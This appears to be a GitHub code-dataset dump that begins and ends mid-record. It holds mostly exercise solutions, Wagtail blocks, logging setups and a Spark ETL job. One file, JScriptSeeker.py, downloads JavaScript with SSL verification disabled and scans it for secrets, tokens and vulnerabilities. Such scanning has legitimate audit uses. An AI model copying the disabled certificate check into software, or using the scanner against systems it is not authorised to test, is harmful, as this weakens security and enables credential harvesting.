b.count(5) > 0:\n b.remove(5)\n\n#4. Lietotājs vada skaitļus, kamēr ievada 0. Tiek izveidots masīvs no ievadītajiem skaitļiem.\n\nc = []\nx = int(input('ievadi skaitli: '))\nc.append(x)\nwhile x != 0:\n x = int(input('ievadi skaitli: '))\n c.append(x)\n if x==0:\n c.remove(0)\n\n#5. Izvadīt no masīva tos skaitļus, kas lielāki par ievadīto n.\nn=int(input('ievadi n: '))\nfor i in range(len(a)):\n if a[i] > n:\n print(a[i], end=' ')\nprint()\n\n#6. Izvadīt elementu summu un lielāko elementu, izmantojot ciklus.\n\nsumma = 0\nfor i in range(len(a)):\n summa+= a[i]\nprint('summa: ',summa)\n\nlielakais = a[0]\nfor i in range(1, len(a)):\n if a[i] > lielakais:\n lielakais= a[i]\n\nprint('leilakais elements: ', lielakais)\n#7. Izvadīt pāra skaitļu skaitu masīvā.\n\npss = 0\nfor i in range(len(a)):\n if a[i] % 2 == 0:\n pss += 1\nprint(pss)\n#8. Programma izvada, kur masīvā atrodas lielākais nepāra skaitlis.\n\nindekss = 0\nLNS = 0\nfor i in range(len(a)):\n if a[i] > LNS and a[i] % 2 != 0:\n LNS = a[i]\n indekss = i\nprint('lielākais nepāra skaitlis: ' )\n\n#9. Programma izvada tos pāra skaitļus, kuriem ir pāra indekss/pozīcija masīvā.\n\nfor i in range(len(a)):\n if i % 2 == 0:\n if a[i] % 2 == 0:\n print(a[i], end=\" \")\n\nprint()\n\n#10. Ja masīvā ir pāra skaits elementu, izvadīt to no sākuma, citādi izvadīt to no otra gala.\n\nif len(a) % 2 == 0:\n for i in range(len(a)):\n print(a[i], end=' ')\nelse:\n for i in range(len(a)-1, -1, -1):\n print(a[i], end=\" \")\n","repo_name":"huindzive/videne","sub_path":"PyCharm/masīvi/gat.kd..py","file_name":"gat.kd..py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31078999485","text":"class Solution:\n def shiftingLetters(self, s: str, shifts: List[int]) -> str:\n stringLen = len(s)\n effect = [0]*stringLen\n \n for i,num in enumerate(shifts):\n effect[0] += num\n \n if i+1 < stringLen:\n effect[i+1]-=num\n \n prefixSum = [effect[0]]\n \n for i in range(1,stringLen):\n prefixSum.append(effect[i]+prefixSum[-1])\n \n answer = []\n \n for i,shift in enumerate(prefixSum):\n char_ord = (ord(s[i])-ord('a') + shift)%26 + ord('a')\n answer.append(chr(char_ord))\n return \"\".join(answer)","repo_name":"Merwan-J/competetive-programming","sub_path":"0848-shifting-letters/0848-shifting-letters.py","file_name":"0848-shifting-letters.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10814704935","text":"from django import forms\nfrom django.utils.safestring import mark_safe\n\nfrom wagtail.blocks import (\n CharBlock,\n ChoiceBlock,\n FieldBlock,\n RichTextBlock,\n StreamBlock,\n StructBlock,\n TextBlock,\n)\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.snippets.blocks import SnippetChooserBlock\n\nfrom markdown import markdown\nfrom pygments import highlight\nfrom pygments.formatters import get_formatter_by_name\nfrom pygments.lexers import get_lexer_by_name\n\nfrom wagtailio.core.blocks import HighlightBlock, TeaserBlock\n\n# Common Streamfield blocks\n\n\nclass BackgroundColourChoiceBlock(FieldBlock): # To be removed?\n field = forms.ChoiceField(choices=((\"red\", \"Red\"), (\"white\", \"White\")))\n\n\nclass ImageFormatChoiceBlock(FieldBlock):\n field = forms.ChoiceField(\n choices=(\n (\"left\", \"Wrap left\"),\n (\"right\", \"Wrap right\"),\n (\"mid\", \"Mid width\"),\n (\"full\", \"Full width\"),\n )\n )\n\n\nclass SimpleImageFormatChoiceBlock(FieldBlock):\n field = forms.ChoiceField(choices=((\"left\", \"Left\"), (\"right\", \"Right\")))\n\n\nclass HTMLAlignmentChoiceBlock(FieldBlock):\n field = forms.ChoiceField(choices=((\"normal\", \"Normal\"), (\"full\", \"Full width\")))\n\n\n# Code and Markdown blocks https://gist.github.com/frankwiles/74a882f16704db9caa27\n\n\nclass CodeBlock(StructBlock):\n \"\"\"\n Code Highlighting Block\n \"\"\"\n\n LANGUAGE_CHOICES = (\n (\"bash\", \"Bash/Shell\"),\n (\"css\", \"CSS\"),\n (\"django\", \"Django templating language\"),\n (\"html\", \"HTML\"),\n (\"javascript\", \"Javascript\"),\n (\"python\", \"Python\"),\n (\"scss\", \"SCSS\"),\n )\n\n language = ChoiceBlock(choices=LANGUAGE_CHOICES)\n code = TextBlock()\n\n class Meta:\n icon = \"code\"\n template = None\n\n def render_markup(self, value, context=None):\n src = value[\"code\"].strip(\"\\n\")\n lang = value[\"language\"]\n\n lexer = get_lexer_by_name(lang)\n formatter = get_formatter_by_name(\n \"html\",\n linenos=None,\n cssclass=\"codehilite\",\n style=\"default\",\n noclasses=False,\n )\n return mark_safe(highlight(src, lexer, formatter))\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context[\"code\"] = self.render_markup(context[\"value\"])\n return context\n\n\nclass MarkDownBlock(TextBlock):\n \"\"\"MarkDown Block\"\"\"\n\n class Meta:\n icon = \"code\"\n\n def render_markup(self, value, context=None):\n md = markdown(\n value, extensions=[\"markdown.extensions.fenced_code\", \"codehilite\"]\n )\n return mark_safe(md)\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context[\"code\"] = self.render_markup(context[\"value\"])\n return context\n\n\n# Main streamfield block to be inherited by Pages\n\n\nclass StoryBlock(StreamBlock):\n h2 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-2.html\",\n )\n h3 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-3.html\",\n )\n h4 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-4.html\",\n )\n paragraph = RichTextBlock(\n icon=\"pilcrow\",\n template=\"patterns/components/streamfields/rich_text_block/rich_text_block.html\",\n )\n blockquote = CharBlock(\n icon=\"openquote\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/quotes/standalone_quote_block.html\",\n )\n image = ImageChooserBlock(\n icon=\"image\", template=\"patterns/components/streamfields/image/image.html\"\n )\n document = DocumentChooserBlock(\n icon=\"doc-full-inverse\",\n template=\"patterns/components/streamfields/document/document.html\",\n )\n embed = EmbedBlock(\n icon=\"code\", template=\"patterns/components/streamfields/embed/embed.html\"\n )\n markdown = MarkDownBlock(\n template=\"patterns/components/streamfields/code_block/code_block.html\"\n )\n codeblock = CodeBlock(\n template=\"patterns/components/streamfields/code_block/code_block.html\"\n )\n teaser = TeaserBlock(group=\"CTA options\")\n get_started_block = SnippetChooserBlock(\n \"core.GetStartedSnippet\",\n icon=\"th-list\",\n template=\"patterns/components/streamfields/get_started_block/get_started_block.html\",\n group=\"CTA options\",\n )\n sign_up_form = SnippetChooserBlock(\n \"core.SignupFormSnippet\",\n icon=\"envelope-open-text\",\n template=\"patterns/components/streamfields/sign_up_form_block/sign_up_form_block.html\",\n group=\"CTA options\",\n )\n highlight = HighlightBlock()\n\n class Meta:\n template = \"patterns/components/streamfields/content_story_block.html\"\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/utils/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"73896679187","text":"'''\nCreated on Jul 7, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nparallelSolve = False\nINF = 1 << 31\n\n\ndef solve(par):\n\n def neg(num):\n if num >= N:\n return num % N\n else:\n return num + N\n\n def find(i):\n if parent[i] != i:\n parent[i] = find(parent[i])\n return parent[i]\n\n def union(i, j):\n p1 = find(i)\n p2 = find(j)\n if rank[p1] < rank[p2]:\n parent[p1] = p2\n else:\n parent[p2] = p1\n if rank[p1] == rank[p2]:\n rank[p1] += 1\n\n N, cmd = par\n parent = list(range(2 * N)) # friends\n rank = [0] * (2 * N)\n result = []\n for c in cmd:\n command, x, y = c\n if command == 1:\n if find(x) == find(neg(y)):\n result.append(-1)\n else:\n union(x, y)\n union(neg(x), neg(y))\n if command == 2:\n if find(x) == find(y):\n result.append(-1)\n else:\n union(x, neg(y))\n union(neg(x), y)\n if command == 3:\n result.append(int(find(x) == find(y)))\n if command == 4:\n result.append(int(find(x) == find(neg(y))))\n\n return '\\n'.join(str(e) for e in result)\n\n\nclass Solver:\n\n def getInput(self):\n self.numOfTests = 1\n self.input = []\n cmd = []\n N = int(self.fIn.readline())\n while True:\n row = map(int, self.fIn.readline().split())\n if row[0] == 0:\n break\n cmd.append(row)\n self.input.append((N, cmd))\n\n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n\n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"%s\\n\" % self.results[test])\n self.fIn.close()\n self.fOut.close()\n\nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10158 - War/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"14825263665","text":"import csv\n\ndef naiveCsv(archivo):\n f = open(archivo, \"rt\")\n for linea in f:\n array = linea.split(\",\")\n print(\"Nombre: {}\".format(array[2].strip('\\n')))\n print(\"Apellido paterno: {}\".format(array[0]))\n print(\"Apellido materno: {}\".format(array[1]))\n print(\"=====================================\\n\")\n\n\ndef betterCsv(archivo):\n with open(archivo, \"rt\") as f:\n reader = csv.reader(f)\n for linea in reader:\n print(\"Nombre: {}\".format(linea[2]))\n\n\ndef naiveWriteCsv(registros):\n f = open(\"registros1.csv\", \"wt\")\n for registro in registros:\n f.write(\",\".join(registro) + '\\n')\n f.close()\n print(\"naiveWriteCsv: Archivo csv generado!\")\n\n\ndef betterWriteCsv(registros):\n with open(\"registros2.csv\", \"wt\") as archivo:\n writer = csv.writer(archivo, delimiter='#')\n for registro in registros:\n writer.writerow(registro)\n print(\"betterWriteCsv: Archivo csv generado!\")\n\n\n# mocos\n\n","repo_name":"levinux/cursoPython","sub_path":"dia1/scripts/func_dia4.py","file_name":"func_dia4.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29926662730","text":"###############################################\n#### LOGGING CLASS SETTINGS (py25+, py30+) ####\n###############################################\n#### also will work with py23, py24 without 'encoding' arg\nimport logging\nimport logging.handlers\nf = logging.Formatter(fmt='%(levelname)s:%(name)s: %(message)s '\n '(%(asctime)s; %(filename)s:%(lineno)d)',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\nhandlers = [\n logging.handlers.RotatingFileHandler('rotated.log', encoding='utf8',\n maxBytes=100000, backupCount=1),\n logging.StreamHandler()\n]\nroot_logger = logging.getLogger()\nroot_logger.setLevel(logging.DEBUG)\nfor h in handlers:\n h.setFormatter(f)\n h.setLevel(logging.DEBUG)\n root_logger.addHandler(h)\n##############################\n#### END LOGGING SETTINGS ####\n##############################\n\n\n####################################################\n#### LOGGING FILECONFIG SETTINGS (py26+, py30+) ####\n####################################################\n\n# logging.conf contents:\n\"\"\"\n[loggers]\nkeys=root\n[handlers]\nkeys=consoleHandler,rotateFileHandler\n[formatters]\nkeys=simpleFormatter\n[logger_root]\nlevel=DEBUG\nhandlers=consoleHandler,rotateFileHandler\n[handler_consoleHandler]\nclass=StreamHandler\nlevel=DEBUG\nformatter=simpleFormatter\nargs=(sys.stdout,)\n[handler_rotateFileHandler]\nclass=handlers.RotatingFileHandler\nlevel=DEBUG\nformatter=simpleFormatter\nargs=('rotated.log', 'a', 100000, 1, 'utf8')\n[formatter_simpleFormatter]\nformat=%(levelname)s:%(name)s: %(message)s (%(asctime)s; %(filename)s:%(lineno)d)\ndatefmt=%Y-%m-%d %H:%M:%S\n\"\"\"\n\nimport logging\nimport logging.config\nlogging.config.fileConfig('logging.conf', disable_existing_loggers=False)\n#########################################\n#### END LOGGING FILECONFIG SETTINGS ####\n#########################################\n\n\n####################################################\n#### LOGGING DICTCONFIG SETTINGS (py27+, py32+) ####\n####################################################\nimport logging\nimport logging.config\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(levelname)s:%(name)s: %(message)s '\n '(%(asctime)s; %(filename)s:%(lineno)d)',\n 'datefmt': \"%Y-%m-%d %H:%M:%S\",\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n },\n 'rotate_file': {\n 'level': 'DEBUG',\n 'formatter': 'standard',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': 'rotated.log',\n 'encoding': 'utf8',\n 'maxBytes': 100000,\n 'backupCount': 1,\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['console', 'rotate_file'],\n 'level': 'DEBUG',\n },\n }\n}\nlogging.config.dictConfig(LOGGING)\n#########################################\n#### END LOGGING DICTCONFIG SETTINGS ####\n#########################################\n","repo_name":"voidabhi/flask","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121481746","text":"# https://atcoder.jp/contests/ddcc2016-qual/submissions/15761565\n# B - ステップカット\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n def calc(x):\n if 0 < x < n:\n return 2 * pow(r ** 2 - (r - 2 * r / n * x) ** 2, 0.5)\n else:\n return 0\n\n r, n, m = map(int, input().split())\n\n res = 0\n for i in range(1, n + m):\n res += max(calc(i), calc(i - m))\n print(res)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/DDCC_2016_Qual/DDCC_2016_Qual-B.py","file_name":"DDCC_2016_Qual-B.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23581044130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 1 11:38:08 2018\n\n@author: joey\n\n\n\"\"\"\n\ndef HexIn(hexadecimal):\n uphex = hexadecimal.upper()\n hexlist = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n decimal = 0\n \n for i in range(0, len(uphex)): \n if i > 0:\n if uphex[i] in hexlist:\n decimal *= 16\n decimal += hexlist.index(uphex[i])\n else:\n decimal += hexlist.index(uphex[i])\n \n print(\"\\ndecimal number =\\t\" + str(decimal))\n DecIn(decimal)\n \n \n \n \ndef DecIn(decimal):\n dec = int(decimal)\n n = 0\n power = 2**n\n \n while dec > power:\n n += 1\n power = 2**n\n if dec <= power:\n break\n \n if dec == 2**n: \n dec -= 2**n\n m = n-1\n else:\n dec -= 2**(n-1)\n m = n-2\n \n binary = '1'\n n2 = m\n \n for i in range(0, n2+1):\n if 2**m > dec:\n binary += '0'\n else:\n binary += '1'\n dec -= 2**m\n m -= 1\n \n print(\"binary number =\\t\" + binary)\n \n\n\ndef DecHex(decimal):\n dec = int(decimal)\n hexx = ''\n hexLst = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n if dec < 16:\n hexx = hexLst[dec]\n else:\n while dec >= 1:\n div = dec/16\n idiv = int(dec/16)\n rem = int((div-idiv)*16)\n \n hexx += hexLst[rem]\n dec = div\n \n hexx = hexx[::-1]\n\n #print((479/16-int(479/16))*16)\n print(\"\\nhex number =\\t\" + str(hexx))\n \n \n \ndef BinIn(binary):\n b2 = str(binary)\n l = len(b2)\n n = l - 1\n decimal = 0\n \n for i in range(0, l):\n if b2[i] == '1':\n decimal += (2**n) \n n -= 1\n print(\"binary number =\\t\" + str(decimal)+\"\\n\")\n DecHex(decimal)\n\n\n\n\n\n\noption = ''\n\nwhile option != '3':\n option = input(\"enter 0 for binary, 1 for decimal, 2 for hexadecimal, or 3 to quit:\\t\")\n \n if option == '0':\n user = input(\"enter binary number:\\t\")\n BinIn(user)\n \n elif option == '1':\n user = input(\"enter decimal number:\\t\")\n DecIn(user)\n DecHex(user)\n \n \n elif option == '2': \n user = input(\"enter hexadecimal number:\\t\")\n HexIn(user)\n","repo_name":"gamblinflanagan/binary-dec-hex","sub_path":"binary-dec-hex.py","file_name":"binary-dec-hex.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73022525265","text":"import urllib.request\r\nimport jsbeautifier\r\nimport ssl\r\nimport find_secrets as fs\r\nimport find_urls as fu\r\nimport find_vulns as fv\r\nimport json\r\nimport argparse\r\nimport sys\r\nimport time\r\nimport threading\r\nimport signal\r\nimport os\r\nfrom urllib.parse import urlparse\r\n\r\n## Spinner sin bibliotecas externas\r\nspinner_chars = '|/-\\\\' # Secuencia de caracteres para el spinner\r\nmensaje_actual = \"\"\r\n\r\ndef mostrar_spinner():\r\n i = 0\r\n while not detener_spinner_event.is_set():\r\n sys.stdout.write('\\r{} {}'.format(spinner_chars[i], mensaje_actual))\r\n sys.stdout.flush()\r\n time.sleep(0.1)\r\n i = (i + 1) % len(spinner_chars)\r\n\r\ndef print_especial(mensaje):\r\n global mensaje_actual\r\n sys.stdout.write('\\033[2K\\r') # Borrar la línea completa\r\n sys.stdout.flush()\r\n mensaje_actual = mensaje\r\n\r\ndef detener_spinner():\r\n detener_spinner_event.set()\r\n sys.stdout.write('\\r\\033[K') # Borrar la línea actual\r\n sys.stdout.flush()\r\n\r\n# Crear un evento para indicar que se debe detener el spinner\r\ndetener_spinner_event = threading.Event()\r\n\r\ndef manejar_interrupcion(signal, frame):\r\n print(\"Programa interrumpido por el usuario.\")\r\n detener_spinner()\r\n sys.exit(0)\r\n\r\n# Registrar el manejador de señal para la interrupción (Ctrl + C)\r\nsignal.signal(signal.SIGINT, manejar_interrupcion)\r\n\r\n## Descargar el archivo javascript y formatearlo\r\ndef analisis_completo(js_url, ruta_json):\r\n # Desactivar la verificación del certificado SSL\r\n ssl_context = ssl.create_default_context()\r\n ssl_context.check_hostname = False\r\n ssl_context.verify_mode = ssl.CERT_NONE\r\n print_especial(\"Descargando...\")\r\n try:\r\n with urllib.request.urlopen(js_url, context=ssl_context) as f:\r\n js_code = f.read().decode('utf-8')\r\n js_code = jsbeautifier.beautify(js_code)\r\n if args.storage_js:\r\n output_dir = os.path.join(args.storage_js, urlparse(js_url).netloc) # Directorio proporcionado por el usuario\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n file_name = os.path.join(output_dir, os.path.relpath(urlparse(js_url).path, '/'))\r\n with open(file_name, 'w') as js_file:\r\n js_file.write(js_code)\r\n\r\n print_especial(fv.buscar_vulns(ruta_json,js_url,js_code))\r\n print_especial(fu.buscar_urls(ruta_json,js_url,js_code))\r\n print_especial(fs.buscar_tokens(ruta_json,js_url,js_code))\r\n print_especial(fs.buscar_entropia(ruta_json,js_url, js_code))\r\n except Exception as e:\r\n print(\"Ocurrió un error al obtener el código JS:\", str(e))\r\n\r\ndef resultados_finales(ruta_json):\r\n with open(ruta_json, encoding=\"utf-8\") as archivo:\r\n data = json.load(archivo)\r\n \r\n for i in data:\r\n url_tmp = i[\"URL\"]\r\n print(f\"\\n*************\\nLos resultados del endpoint {url_tmp} son los siguientes:\\n\")\r\n\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_endpoints\"])\r\n print(f\"{num_patterns} patrones coincidentes, en la búsqueda de endpoints\")\r\n for j in i[\"JS_Analisis\"][\"JS_Possible_endpoints\"]:\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_endpoints\"][j][\"results\"])\r\n print(f\" Un total de {num_patterns} posibles {j}\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_Vulns\"])\r\n print(f\"{num_patterns} patrones coincidentes, en el análisis de vulnerabilidades\")\r\n for j in i[\"JS_Analisis\"][\"JS_Possible_Vulns\"]:\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_Vulns\"][j][\"results\"])\r\n print(f\" Un total de {num_patterns} de tipo {j}\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_tokens\"])\r\n print(f\"{num_patterns} patrones coincidentes, en la búsqueda de tokens\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Entropy_Tokens\"][\"results\"])\r\n print(f\"{num_patterns} patrones coincidentes, en el análisis de entropía\")\r\n for j in i[\"JS_Analisis\"][\"JS_Entropy_Tokens\"][\"results\"]:\r\n match_tmp = j[\"match\"]\r\n print(f\" Posible token {match_tmp}\")\r\n \r\n print(\"\\n*************\\n\")\r\n\r\ndef crear_json_vacio(ruta_json):\r\n # Crear el json\r\n data = []\r\n with open(ruta_json, \"w\", encoding=\"utf-8\") as archivo:\r\n json.dump(data, archivo, indent=4, ensure_ascii=False)\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-u', '--urls-file', help='Archivo de URLs')\r\n parser.add_argument('-U', '--url', help='URL Única')\r\n parser.add_argument('-o', '--output', help='Archivo de salida')\r\n parser.add_argument('-s', '--storage-js', help='Indicar el directorio en el que almacenar el código JS')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.output:\r\n ruta_json = args.output + \".json\"\r\n else:\r\n # Valor por defecto si no se proporciona el argumento\r\n ruta_json = \"js_analysis.json\"\r\n \r\n # Crear y ejecutar el hilo para mostrar el spinner\r\n spinner_thread = threading.Thread(target=mostrar_spinner)\r\n spinner_thread.start()\r\n\r\n if args.urls_file:\r\n fichero = args.urls_file \r\n ## Main ##\r\n print_especial(\"Comenzamos a descargar y analizar los archivos, este proceso puede tardar un rato\")\r\n # Lista para almacenar las URLs\r\n urls = []\r\n # Leer las URLs del archivo de texto\r\n with open(fichero, 'r') as f:\r\n urls = f.read().splitlines()\r\n # Crear un json vacío que se irá rellenando\r\n crear_json_vacio(ruta_json)\r\n # Llama a la función principal del programa\r\n for js_url in urls:\r\n analisis_completo(js_url,ruta_json)\r\n\r\n elif args.url:\r\n ## Main ##\r\n print_especial(\"Comenzamos a descargar y analizar los archivos, este proceso puede tardar un rato\")\r\n # Crear un json vacío que se irá rellenando\r\n crear_json_vacio(ruta_json)\r\n # Llama a la función principal del programa\r\n analisis_completo(args.url,ruta_json)\r\n\r\n else:\r\n # Detener el spinner\r\n detener_spinner()\r\n spinner_thread.join() # Esperar a que el hilo del spinner termine\r\n\r\n parser.error(\"Es necesario introducir un Input\")\r\n\r\n # Detener el spinner\r\n detener_spinner()\r\n spinner_thread.join() # Esperar a que el hilo del spinner termine\r\n\r\n print(f\"\\nLos resultados se encuentran en {ruta_json}\")\r\n resultados_finales(ruta_json)\r\n","repo_name":"barricadadigital/JScriptSeeker","sub_path":"JScriptSeeker.py","file_name":"JScriptSeeker.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11450580590","text":"import os\r\nfile = 'C\\\\Microsoft VS Code\\\\lab\\\\QUESTIONS'\r\nfile1 = open('tiff.txt', 'w')\r\np = os.listdir(file)\r\nsp = []\r\nsp1 = []\r\nfor i in p:\r\n if \".png\" in i:\r\n sp.append(i)\r\n if \".jpg\" in i:\r\n sp1.append(i)\r\n if \".tiff\" in i:\r\n file1.write(i + \"\\n\")\r\nL = len(sp)\r\nprint(\"Кількість файлів '.png' :\", L)\r\nprint(\"Файли з розширенням '.jpg' :\", sp1)\r\nfile1.close() ","repo_name":"MaksKulinich/MKG","sub_path":"lab10(2).py","file_name":"lab10(2).py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15427619306","text":"\"\"\"\r\nProcess job flow for dataA Dim Customer.\r\n\"\"\"\r\nfrom pyspark.sql import DataFrame\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql import functions as F\r\nfrom spark_process_common.process import BaseProcess, MISSING_DESC, MISSING_STRING_ID\r\n\r\nclass ProcessDimCustomerdataA(BaseProcess):\r\n\r\n def transform(self, sources: dict) -> DataFrame:\r\n \"\"\"\r\n Dim Customer records and attributes from dataA Sources\r\n \"\"\"\r\n spark = self.get_spark() \r\n mc = spark.read.orc(sources['mstr_customer_vw']['path'])\r\n mcy = spark.read.orc(sources['glb_mstr_country']['path'])\r\n mt = spark.read.orc(sources['glb_mstr_geo_territory']['path'])\r\n msr = spark.read.orc(sources['glb_mstr_geo_sub_region']['path'])\r\n mr = spark.read.orc(sources['glb_mstr_geo_region']['path'])\r\n ma = spark.read.orc(sources['glb_mstr_geo_area']['path'])\r\n ms = spark.read.orc(sources['glb_mstr_geo_state']['path'])\r\n\r\n df = (\r\n mc.join(mcy, [mcy.country_id == mc.country_id], 'left_outer')\r\n .join(mt, [mt.geo_territory_id == mcy.geo_territory_id], 'left_outer')\r\n .join(msr, [msr.geo_sub_region_id == mt.geo_sub_region_id], 'left_outer')\r\n .join(mr, [mr.geo_region_id == msr.geo_region_id], 'left_outer')\r\n .join(ma, [ma.geo_area_id == mr.geo_area_id], 'left_outer')\r\n .join(ms, [ms.state_id == mc.state_id, ms.country_id == mc.country_id], 'left_outer')\r\n .select(\r\n mc.system_id, mc.customer_id, mc.customer_desc, mc.country_id, mcy.country_desc,\r\n mt.geo_territory_id, mt.geo_territory_desc, msr.geo_sub_region_id, msr.geo_sub_region_desc,\r\n mr.geo_region_id, mr.geo_region_desc, ma.geo_area_id, ma.geo_area_desc, ms.state_id,\r\n ms.state_desc, mc.county, mc.city, mc.postal_code, mc.top_10_desc \r\n )\r\n )\r\n\r\n df = df.withColumn('iptmeta_source_system', F.lit('dataA'))\r\n df = df.withColumn(\"customer_key\", F.concat_ws('_', df.system_id, df.customer_id))\r\n df = df.withColumn(\"customer_description\", F.coalesce(F.upper(df.customer_desc), F.lit(MISSING_DESC)))\r\n\r\n df = (\r\n df.withColumn(\"country_id\", F.coalesce(F.upper(df.country_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"country_description\", F.coalesce(F.upper(df.country_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"territory_id\", F.coalesce(F.upper(df.geo_territory_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"territory_description\", F.coalesce(F.upper(df.geo_territory_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"sub_region_id\", F.coalesce(F.upper(df.geo_sub_region_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"sub_region_description\", F.coalesce(F.upper(df.geo_sub_region_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"region_id\", F.coalesce(F.upper(df.geo_region_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"region_description\", F.coalesce(F.upper(df.geo_region_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"area_id\", F.coalesce(F.upper(df.geo_area_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"area_description\", F.coalesce(F.upper(df.geo_area_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"state_id\", F.coalesce(F.upper(df.state_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"state_description\", F.coalesce(F.upper(df.state_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"county\", F.coalesce(F.upper(df.county), F.lit(MISSING_DESC)))\r\n )\r\n\r\n df = df.withColumn(\"city\", F.coalesce(F.upper(df.city), F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"postal_code\", F.coalesce(df.postal_code, F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"commercial_parent\", F.coalesce(df.top_10_desc, F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"brand_owner\", F.coalesce(df.customer_desc, df.top_10_desc, F.lit(MISSING_DESC)))\r\n\r\n df = df.withColumnRenamed('system_id', 'billing_system')\r\n \r\n df = df.select(\r\n df.billing_system, df.customer_id, df.brand_owner, df.iptmeta_source_system\r\n , df.customer_key, df.customer_description\r\n , df.country_id, df.country_description, df.territory_id, df.territory_description\r\n , df.sub_region_id, df.sub_region_description, df.region_id, df.region_description\r\n , df.area_id, df.area_description, df.state_id, df.state_description\r\n , df.county, df.city, df.postal_code, df.commercial_parent\r\n )\r\n\r\n return 